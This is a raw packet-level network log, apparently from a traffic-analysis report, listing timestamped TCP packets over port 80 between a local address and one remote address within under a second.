Dec 10, 2024 00:42:38.756299973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.757177114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.757224083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.757302999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.757339001 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.758289099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.758389950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.758443117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.759406090 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.759511948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.759577036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.760487080 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.760560036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.760602951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.761280060 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.761568069 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.761688948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.761714935 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.761730909 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.762654066 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.762698889 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.762768030 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.762804985 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.763781071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.763861895 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.763892889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.764143944 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.764861107 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.764986038 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.765044928 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.765994072 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.766100883 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.766160011 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.767055035 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.767149925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.767196894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.768145084 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.768203974 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.768246889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.768306017 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.769237995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.769287109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.769340038 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.770375967 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.770522118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.770581007 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.771450043 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.771603107 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.771666050 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.772521973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.772574902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.772634029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.773241997 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.773628950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.773677111 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.773730040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.773869038 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.774717093 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.774759054 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.774761915 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.774844885 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.775827885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.775876999 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.775948048 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.776024103 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.776899099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.777029991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.777077913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.777985096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.778110027 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.778167009 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.779092073 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.779150009 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.779200077 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.780222893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.780278921 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.780304909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.780376911 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.781303883 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.781445026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.781490088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.782397032 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.782445908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.782481909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.782530069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.783483028 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.783601999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.783647060 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.784571886 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.784619093 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.784657001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.784748077 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.785650969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.785698891 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.785757065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.785801888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.786750078 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.786794901 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.786834955 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.786883116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.787837029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.787884951 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.787925959 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.787972927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.788953066 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.789000034 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.789072037 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.789115906 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.790040970 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.790088892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.790158033 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.790201902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.791167021 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.791217089 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.791261911 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.791306973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.792263985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.792311907 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.792366028 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.792408943 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.793354988 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.793401957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.793437004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.793500900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.794434071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.794476986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.794553995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.794596910 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.795543909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.795581102 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.795588970 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.795624018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.796621084 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.796672106 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.796747923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.796799898 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.797837973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.797858000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.797895908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.797909021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.798820019 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.798866034 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.799015999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.799063921 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.799923897 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.799971104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.800017118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.800064087 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.801012039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.801075935 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.801093102 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.801147938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.802088022 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.802134991 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.802160025 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.802203894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.803199053 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.803246975 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.803319931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.803364038 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.804291964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.804336071 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.804398060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.804445982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.805377960 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.805422068 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.805491924 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.805537939 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.806478024 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.806519985 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.806570053 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.806612015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.918386936 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.918504953 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.918576956 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.918596029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.918920994 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.918968916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.919033051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.919085026 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.920036077 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.920089960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.920130014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.920173883 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.921124935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.921195984 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.954406977 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.954468012 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.954684019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.954909086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.954967976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.955049038 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.955986023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.956038952 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.956077099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.957123995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.957169056 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.957170010 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.957210064 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.958187103 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.958291054 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.958338976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.959276915 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.959384918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.959441900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.960362911 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.960477114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.960524082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.961469889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.961587906 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.961636066 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.962574005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.962740898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.962795019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.963668108 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.963795900 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.963849068 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.964740038 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.964849949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.964898109 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.965842962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.965956926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.966006041 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.966938972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.967005014 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.967047930 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.967138052 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.968034029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.968086004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.968123913 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.968173027 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.969163895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.969212055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.969279051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.969325066 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.970240116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.970371008 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.970382929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.970408916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.971327066 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.971373081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.971431971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.971477985 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.972409010 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.972456932 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.972526073 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.972583055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.973490000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.973540068 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.973599911 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.973647118 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.974621058 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.974670887 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.974690914 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.974735022 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.975718021 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.975770950 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.975836992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.975883007 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.976789951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.976840973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.976890087 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.976933002 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.977883101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.977931976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.978106976 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.978156090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.978970051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.979021072 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.979078054 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.979129076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.980124950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.980175018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.980206966 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.980247021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.981167078 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.981218100 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.981328964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.981374979 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.982307911 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.982362986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.982424021 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.982470989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.983376026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.983439922 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.983494997 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.983557940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.984456062 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.984507084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.984560013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.984603882 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.985558033 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.985604048 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.985666990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.985709906 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.986653090 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.986699104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.986757040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.986803055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.987749100 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.987798929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.987833023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.987876892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.988850117 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.988893986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.988960028 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.989001036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.989943981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.989991903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.990055084 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.990102053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.991072893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.991133928 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.991188049 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.991231918 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.992144108 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.992196083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.992227077 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.992270947 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.993263960 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.993310928 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.993400097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.993465900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.994335890 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.994385958 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.994447947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.994493961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.995421886 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.995476961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.995527029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.995564938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.996496916 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.996545076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.996692896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.996740103 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.997617960 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.997664928 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.997664928 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.997704029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.998692989 CET	80	49759	185.215.113.16	192.168.2.4
